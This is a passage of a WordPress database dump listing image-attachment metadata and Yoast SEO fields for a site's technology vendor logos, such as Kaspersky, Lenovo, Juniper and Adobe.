{s:4:\"file\";s:20:\"HP-Logo-V2-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1631,1682,'_wp_attached_file','2018/12/Jabra-Logo.jpg'),(1632,1682,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:22:\"2018/12/Jabra-Logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Jabra-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Jabra-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Jabra-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Jabra-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"Jabra-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"Jabra-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"Jabra-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"Jabra-Logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1633,1683,'_wp_attached_file','2018/12/Juniper-Logo.jpg'),(1634,1683,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/Juniper-Logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Juniper-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Juniper-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Juniper-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Juniper-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Juniper-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Juniper-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Juniper-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Juniper-Logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1635,1684,'_wp_attached_file','2018/12/Kaspersky-Logo.jpg'),(1636,1684,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:26:\"2018/12/Kaspersky-Logo.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Kaspersky-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Kaspersky-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"Kaspersky-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Kaspersky-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"Kaspersky-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"Kaspersky-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"Kaspersky-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1637,1685,'_wp_attached_file','2018/12/Kingston-Logo.jpg'),(1638,1685,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:25:\"2018/12/Kingston-Logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Kingston-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Kingston-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Kingston-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Kingston-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Kingston-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Kingston-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Kingston-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Kingston-Logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1882,1769,'_wp_attached_file','2018/12/Atlas.ti-Logo.png'),(1883,1769,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:25:\"2018/12/Atlas.ti-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Atlas.ti-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Atlas.ti-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Atlas.ti-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Atlas.ti-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Atlas.ti-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Atlas.ti-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Atlas.ti-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"Atlas.ti-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1876,1714,'_wp_attachment_image_alt','Wacom logo'),(1877,1498,'_thumbnail_id','1714'),(1878,1498,'_yoast_wpseo_metadesc','Interactive pen displays, pen tablets, and styluses'),(1879,1498,'_yoast_wpseo_content_score','90'),(1880,1768,'_wp_attached_file','2018/12/Acronis-Logo.png'),(1881,1768,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/Acronis-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Acronis-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Acronis-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Acronis-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Acronis-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Acronis-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Acronis-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Acronis-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Acronis-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1643,1688,'_wp_attached_file','2018/12/logmein-rescue2.png'),(1644,1688,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:660;s:6:\"height\";i:440;s:4:\"file\";s:27:\"2018/12/logmein-rescue2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"logmein-rescue2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"logmein-rescue2-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:27:\"logmein-rescue2-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:27:\"logmein-rescue2-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:27:\"logmein-rescue2-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1710,1716,'_wp_attached_file','2018/12/Acer-Logo.jpg'),(1711,1716,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:21:\"2018/12/Acer-Logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Acer-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Acer-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"Acer-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"Acer-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"Acer-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"Acer-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"Acer-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"Acer-Logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1647,1669,'_wp_attachment_image_alt','Autodesk'),(1648,1429,'_thumbnail_id','3223'),(1649,1429,'_yoast_wpseo_metadesc','Wireless Router, Router, Wireless Access Point, Switch'),(1650,1429,'_yoast_wpseo_content_score','60'),(1651,1690,'_edit_lock','1545296642:1'),(1652,1690,'_edit_last','1'),(1653,1691,'_wp_attached_file','2018/12/Kaspersky-Logo-1.jpg'),(1654,1691,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:28:\"2018/12/Kaspersky-Logo-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Kaspersky-Logo-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Kaspersky-Logo-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"Kaspersky-Logo-1-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"Kaspersky-Logo-1-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"Kaspersky-Logo-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"Kaspersky-Logo-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:28:\"Kaspersky-Logo-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1875,1433,'_yoast_wpseo_content_score','60'),(1855,1345,'_yoast_wpseo_metadesc','Security, Application Delivery and Data Protection Solutions'),(1856,1345,'_yoast_wpseo_content_score','60'),(1857,1344,'_thumbnail_id','1669'),(1858,1344,'_yoast_wpseo_content_score','60'),(1859,1668,'_wp_attachment_image_alt','APC Logo'),(1860,1329,'_thumbnail_id','1668'),(1861,1329,'_yoast_wpseo_content_score','30'),(1862,1696,'_wp_attachment_image_alt','Logo Adobe'),(1863,1325,'_thumbnail_id','1696'),(1864,1325,'_yoast_wpseo_metadesc','Image editing software, Acrobat Reader'),(1865,1325,'_yoast_wpseo_content_score','60'),(1866,1716,'_wp_attachment_image_alt','Acer Logo'),(1867,1444,'_yoast_wpseo_focuskw','Autodesk'),(1868,1444,'_yoast_wpseo_linkdex','79'),(1869,1437,'_yoast_wpseo_content_score','30'),(1870,1437,'_yoast_wpseo_focuskw','Anydesk'),(1871,1437,'_yoast_wpseo_linkdex','56'),(1872,1709,'_wp_attachment_image_alt','Seagate Logo'),(1873,1433,'_thumbnail_id','1709'),(1874,1433,'_yoast_wpseo_metadesc','Hard Disk Drive, Solid State Drive'),(1657,1693,'_wp_attached_file','2018/12/Lenovo-Logo-1.jpg'),(1658,1693,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:25:\"2018/12/Lenovo-Logo-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Lenovo-Logo-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Lenovo-Logo-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Lenovo-Logo-1-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Lenovo-Logo-1-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Lenovo-Logo-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Lenovo-Logo-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Lenovo-Logo-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1659,1694,'_wp_attached_file','2018/12/Logitech-Logo-1.jpg'),(1660,1694,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:27:\"2018/12/Logitech-Logo-1.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Logitech-Logo-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Logitech-Logo-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"Logitech-Logo-1-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"Logitech-Logo-1-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:27:\"Logitech-Logo-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:27:\"Logitech-Logo-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:27:\"Logitech-Logo-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:25:\"Logitech-Logo-1-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1738,1698,'_wp_attachment_image_alt','Logo TV'),(1723,1680,'_wp_attachment_image_alt',''),(1724,1635,'_thumbnail_id','3234'),(1725,1635,'_yoast_wpseo_content_score','60'),(1726,1706,'_wp_attachment_image_alt','Ruckus'),(1727,1678,'_wp_attachment_image_alt','GoToMeeting'),(1728,1631,'_thumbnail_id','3232'),(1729,1715,'_wp_attachment_image_alt','Zebra Logo'),(1730,1505,'_thumbnail_id','1715'),(1731,1505,'_yoast_wpseo_metadesc','Barcode Scanners, Data Capture, Mobile Printers, Card Printers, Rugged headsets and Mobile Computers'),(1732,1505,'_yoast_wpseo_content_score','60'),(1733,1504,'_yoast_wpseo_metadesc','Windows data compression tool'),(1734,1504,'_yoast_wpseo_content_score','60'),(1735,1711,'_wp_attachment_image_alt','Veritas Logo'),(1736,1495,'_thumbnail_id','1711'),(1737,1495,'_yoast_wpseo_content_score','60'),(1663,1696,'_wp_attached_file','2018/12/Logo-Adobe-1.jpg'),(1664,1696,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/Logo-Adobe-1.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Logo-Adobe-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Logo-Adobe-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Logo-Adobe-1-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"lar